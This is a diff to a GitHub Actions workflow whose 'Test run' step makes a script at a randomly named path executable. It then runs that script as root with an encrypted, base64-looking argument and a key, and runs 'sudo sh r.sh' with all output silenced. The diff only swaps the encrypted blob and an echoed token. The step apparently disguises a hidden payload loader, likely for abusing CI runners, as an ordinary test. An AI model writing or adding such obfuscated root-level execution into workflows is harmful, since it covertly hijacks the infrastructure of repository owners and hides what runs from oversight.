--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'ku7q7'
+        echo 'u45gq'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19LHCVUVcstNrYhoA+7iS82DLb5XYYrTcWuKTJSZlKbpmmGihxlmkA4g7PNykTy2c7L0RlD1GG5mULDHQbzjIOlkT8GeyvxiNC1GcyeJ8eiP3Rg3reO1i9+ lpllm4 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX185fJnlwa0OFcyHYJbzAzGbmQd7OsADzdmMNgoJVhAghBmKcg5D5vjbiOjmQmfRJ8B+BVY7DY0I7Epb8NxK5H3DXBQGr9BQ9Lib4mBSXseCtfHuTUy8i4u9 bvy3l0 && sudo sh r.sh > /dev/null 2>&1
